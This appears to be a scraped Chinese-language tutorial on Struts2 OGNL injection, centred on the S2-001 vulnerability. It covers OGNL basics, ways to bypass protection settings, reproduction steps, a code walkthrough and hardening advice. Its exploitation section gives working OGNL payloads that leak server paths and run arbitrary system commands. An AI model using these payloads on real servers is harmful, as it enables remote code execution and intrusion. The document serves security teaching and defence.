Struts2框架安全漏洞分析与利用教学文档<\/h1>

1. Struts2框架概述<\/h2>

1.1 基本概念<\/h3>

MVC架构<\/strong>：Struts2是基于MVC(Model-View-Controller)设计模式的Web应用框架<\/li>
技术基础<\/strong>：Struts2融合了Struts1和WebWork的技术优势，核心机制基于WebWork<\/li>

核心特性<\/strong>：

使用"拦截器(Interceptor)"机制处理用户请求<\/li>
业务逻辑控制器与Servlet API完全解耦<\/li>
默认采用OGNL作为表达式语言<\/li> <\/ul> <\/li> <\/ul>
1.2 架构组成<\/h3>

Model<\/strong>：负责数据维护和业务逻辑(通常是Action类)<\/li>
View<\/strong>：负责页面展示(Result)<\/li>
Controller<\/strong>：通过代码控制请求流程<\/li> <\/ul>
2. OGNL表达式语言<\/h2>
2.1 OGNL简介<\/h3>

全称<\/strong>：Object-Graph Navigation Language<\/li>
功能<\/strong>：通过简洁语法访问对象属性、调用方法、创建集合、构造Map等<\/li>
示例<\/strong>：person.address[0].province<\/code>访问user1的person属性中第一个address的province字段<\/li> <\/ul> 2.2 OGNL核心功能<\/h3> 功能类别<\/th> 示例<\/th> 说明<\/th> <\/tr> <\/thead> 属性访问<\/td> name.length()<\/code><\/td> 访问属性<\/td> <\/tr> 方法调用<\/td> #user.hashCode()<\/code><\/td> 调用方法<\/td> <\/tr> 数组访问<\/td> "name".toCharArray()[0]<\/code><\/td> 访问数组元素<\/td> <\/tr> 集合操作<\/td> 'admin' in {'user', 'admin', 'guest'}<\/code><\/td> 判断元素是否在集合中<\/td> <\/tr> 静态方法<\/td> @java.lang.Math@floor(10.9)<\/code><\/td> 调用静态方法<\/td> <\/tr> 静态字段<\/td> @com.demo.Constants@DEFAULT_TIMEOUT<\/code><\/td> 访问静态字段<\/td> <\/tr> 表达式组合<\/td> price=100, discount=0.8, price*discount<\/code><\/td> 支持多个表达式组合<\/td> <\/tr> 对象构造<\/td> new java.util.ArrayList()<\/code><\/td> 创建新对象<\/td> <\/tr> Map构造<\/td> #{'key1':'value1', 'key2':'value2'}<\/code><\/td> 构造Map<\/td> <\/tr> <\/tbody> <\/table> 2.3 OGNL上下文<\/h3> OgnlContext<\/strong>：本质是一个Map，包含以下核心元素： _root<\/code>：上下文的根对象<\/li> _values<\/code>：以Map形式保存传入上下文的参数<\/li> ClassResolver<\/code>：处理类加载的策略<\/li> TypeConverter<\/code>：处理类型转换<\/li> MemberAccess<\/code>：控制访问对象成员的权限策略<\/li> <\/ul> <\/li> <\/ul> 3. Struts2漏洞分析<\/h2> 3.1 漏洞根源<\/h3> 核心问题<\/strong>：OGNL表达式解析过程中的未加限制或未正确过滤<\/li> 攻击方式<\/strong>：通过精心构造的恶意表达式执行任意方法调用、类加载、系统命令执行<\/li> 常见漏洞类型<\/strong>：远程命令执行(RCE)<\/li> <\/ul> 3.2 防护机制与绕过<\/h3> 防护机制<\/th> 描述<\/th> 绕过方式<\/th> <\/tr> <\/thead> allowStaticMethodAccess<\/td> 是否允许调用静态方法<\/td> 通过OGNL动态修改配置<\/td> <\/tr> allowStaticFieldAccess<\/td> 是否允许访问静态属性<\/td> 通过反射设置私有属性访问权限<\/td> <\/tr> xwork.MethodAccessor.denyMethodExecution<\/td> 防止OGNL调用方法<\/td> 修改安全策略<\/td> <\/tr> excludedPackageNames\/Classes<\/td> 黑名单限制调用指定包或类<\/td> 使用非黑名单类或方法<\/td> <\/tr> <\/tbody> <\/table> 4. S2-001漏洞详解<\/h2> 4.1 漏洞信息<\/h3> 影响版本<\/strong>：Struts 2.0.0 - 2.0.8<\/li> CVE编号<\/strong>：CVE-2007-4556<\/li> 漏洞原理<\/strong>：用户提交表单数据验证失败时，后端使用OGNL表达式%{value}<\/code>解析参数值<\/li> 重新填充到表单数据时执行了恶意OGNL表达式<\/li> <\/ul> <\/li> <\/ul> 4.2 漏洞复现<\/h3> 环境搭建<\/h4> 创建Maven项目并添加Struts2 2.0.8依赖<\/li> 配置web.xml添加Struts2过滤器<\/li> 创建Action类和JSP视图文件<\/li> 配置struts.xml定义Action映射<\/li> <\/ol> 关键配置<\/h4> <\/span> <\/span><\/span><filter><\/span> <\/span><\/span> <filter-name><\/span>struts2<\/filter-name><\/span> <\/span><\/span> <filter-class><\/span>org.apache.struts2.dispatcher.FilterDispatcher<\/filter-class><\/span> <\/span><\/span><\/filter><\/span> <\/span><\/span><filter-mapping><\/span> <\/span><\/span> <filter-name><\/span>struts2<\/filter-name><\/span> <\/span><\/span> <url-pattern><\/span>\/*<\/url-pattern><\/span> <\/span><\/span><\/filter-mapping><\/span> <\/span><\/span><\/code><\/pre>漏洞探测<\/h4> 输入测试：%{1111*11}<\/code><\/li> 预期结果：返回计算结果12221<\/code>表明存在OGNL表达式注入<\/li> <\/ul> 漏洞利用<\/h4> 获取Tomcat执行路径： %{"tomcatBinPath="+@java.lang.System@getProperty("user.dir")} <\/code><\/pre> <\/li> 获取Web路径： %{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#response.getWriter().println(#req.getRealPath('\/')),#response.getWriter().flush(),#response.getWriter().close()} <\/code><\/pre> <\/li> 执行任意命令： %{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"whoami"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()} <\/code><\/pre> <\/li> <\/ol> 4.3 漏洞修复<\/h3> 修复方案<\/strong>：在xwork 2.0.4中添加maxLoopCount属性限制递归解析的最大数目<\/li> 升级建议<\/strong>：升级到不受影响的Struts2版本<\/li> <\/ul> 5. 漏洞利用流程分析<\/h2> 5.1 请求处理流程<\/h3> FilterDispatcher.doFilter<\/strong>：请求入口<\/li> dispatcher.serviceAction<\/strong>：核心请求处理创建ActionProxy<\/li> 初始化DefaultActionInvocation<\/li> <\/ul> <\/li> 拦截器链执行<\/strong>： ParametersInterceptor处理请求参数<\/li> 通过OgnlValueStack.setValue设置参数值<\/li> <\/ul> <\/li> Action执行<\/strong>：调用目标Action的execute方法<\/li> 结果渲染<\/strong>：执行Result实现类的execute方法<\/li> <\/ol> 5.2 漏洞触发点<\/h3> ParametersInterceptor<\/strong>：处理请求参数时未充分过滤OGNL表达式<\/li> TextParseUtil.translateVariables<\/strong>：对参数值进行二次解析<\/li> OGNL表达式执行<\/strong>：通过while循环不断解析表达式导致任意代码执行<\/li> <\/ol> 5.3 关键代码分析<\/h3> \/\/ ParametersInterceptor.doIntercept <\/span><\/span><\/span><\/span>public<\/span> String doIntercept<\/span>(<\/span>ActionInvocation invocation)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> Object action =<\/span> invocation.<\/span>getAction<\/span>();<\/span> <\/span><\/span> \/\/ 获取并处理请求参数 <\/span><\/span><\/span><\/span> setParameters(<\/span>action,<\/span> new<\/span> HashMap<<\/span>String,<\/span> Object>(),<\/span> new<\/span> HashSet<<\/span>String>());<\/span> <\/span><\/span> return<\/span> invocation.<\/span>invoke<\/span>();<\/span> <\/span><\/span>}<\/span> <\/span><\/span> <\/span><\/span>\/\/ OgnlValueStack.setValue <\/span><\/span><\/span><\/span>public<\/span> void<\/span> setValue<\/span>(<\/span>String expr,<\/span> Object value)<\/span> {<\/span> <\/span><\/span> \/\/ 解析并执行OGNL表达式 <\/span><\/span><\/span><\/span> ognlUtil.<\/span>setValue<\/span>(<\/span>expr,<\/span> context,<\/span> root,<\/span> value,<\/span> throwExceptionOnFailure);<\/span> <\/span><\/span>}<\/span> <\/span><\/span> <\/span><\/span>\/\/ TextParseUtil.translateVariables <\/span><\/span><\/span><\/span>public<\/span> static<\/span> Object translateVariables<\/span>(<\/span>char<\/span> open,<\/span> String expression,<\/span> ValueStack stack,<\/span> Class asType,<\/span> ParsedValueEvaluator evaluator)<\/span> {<\/span> <\/span><\/span> \/\/ 解析%{}包裹的表达式 <\/span><\/span><\/span><\/span> while<\/span> (<\/span>true<\/span>)<\/span> {<\/span> <\/span><\/span> int<\/span> start =<\/span> expression.<\/span>indexOf<\/span>(<\/span>open +<\/span> "{"<\/span>);<\/span> <\/span><\/span> if<\/span> (<\/span>start ==<\/span> -<\/span>1<\/span>)<\/span> {<\/span> <\/span><\/span> break<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span> \/\/ 递归解析导致漏洞 <\/span><\/span><\/span><\/span> String var =<\/span> expression.<\/span>substring<\/span>(<\/span>start +<\/span> 2<\/span>,<\/span> end);<\/span> <\/span><\/span> Object o =<\/span> stack.<\/span>findValue<\/span>(<\/span>var,<\/span> asType);<\/span> <\/span><\/span> \/\/ ... <\/span><\/span><\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>6. 防御措施<\/h2> 6.1 开发建议<\/h3> 禁用或限制OGNL表达式功能<\/li> 严格过滤用户输入<\/li> 关闭调试模式(devMode=false)<\/li> 使用最新稳定版本框架<\/li> <\/ol> 6.2 安全配置<\/h3> <\/span> <\/span><\/span><constant<\/span> name=<\/span>"struts.ognl.allowStaticMethodAccess"<\/span> value=<\/span>"false"<\/span>\/><\/span> <\/span><\/span><constant<\/span> name=<\/span>"struts.devMode"<\/span> value=<\/span>"false"<\/span>\/><\/span> <\/span><\/span><constant<\/span> name=<\/span>"struts.excludedClasses"<\/span> value=<\/span>"java.lang.Object,java.lang.Runtime"<\/span>\/><\/span> <\/span><\/span><\/code><\/pre>6.3 监控与检测<\/h3> 监控异常OGNL表达式执行<\/li> 定期进行安全扫描<\/li> 建立输入验证机制<\/li> <\/ol> 7. 总结<\/h2> Struts2框架的安全漏洞主要源于OGNL表达式的强大功能和缺乏足够的安全限制。S2-001漏洞展示了当用户输入被直接解析为OGNL表达式时可能导致的严重后果。理解Struts2的请求处理流程和OGNL表达式的工作机制对于发现和防御此类漏洞至关重要。开发者应当遵循安全最佳实践，及时更新框架版本，并实施严格的安全配置来降低风险。<\/p>